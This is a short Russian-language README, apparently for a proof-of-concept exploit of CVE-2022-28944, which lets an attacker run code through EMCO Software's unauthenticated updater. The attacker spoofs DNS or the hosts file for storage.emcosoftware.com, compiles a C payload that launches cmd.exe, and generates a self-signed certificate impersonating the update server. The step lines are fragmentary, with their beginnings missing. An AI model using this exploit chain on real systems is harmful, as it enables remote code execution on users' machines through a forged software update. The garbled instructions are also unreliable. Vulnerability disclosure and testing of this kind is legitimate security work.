
Эксплойт proof-of-concept для неаутентифицированного удаленного выполнения кода в продуктах EMCO Software через спуфинг DNS и внедрение вредоносного обновления.
Уязвимость удаленного выполнения кода из-за неаутентифицированного обновления в нескольких продуктах EMCO Software.
Использование: python3 cve-2022-28944_poc.py
Подробности в отчете на gerr.re.
storage.emcosoftware.com на IP-адрес атакующего;
c:\windows\system32\drivers\etc\hosts на целевой системе.
proof.c на стороне атакующего, например, с помощью i686-w64-mingw32-gcc proof.c -o proof.exe;#include <windows.h>
int main(int argc, char const *argv[]){
WinExec("cmd.exe",1);
return TRUE;
}
openssl req -new -x509 -keyout storage.emcosoftware.com.pem -out storage.emcosoftware.com.pem -days 365 -nodes -subj "/CN=storage.emcosoftware.com"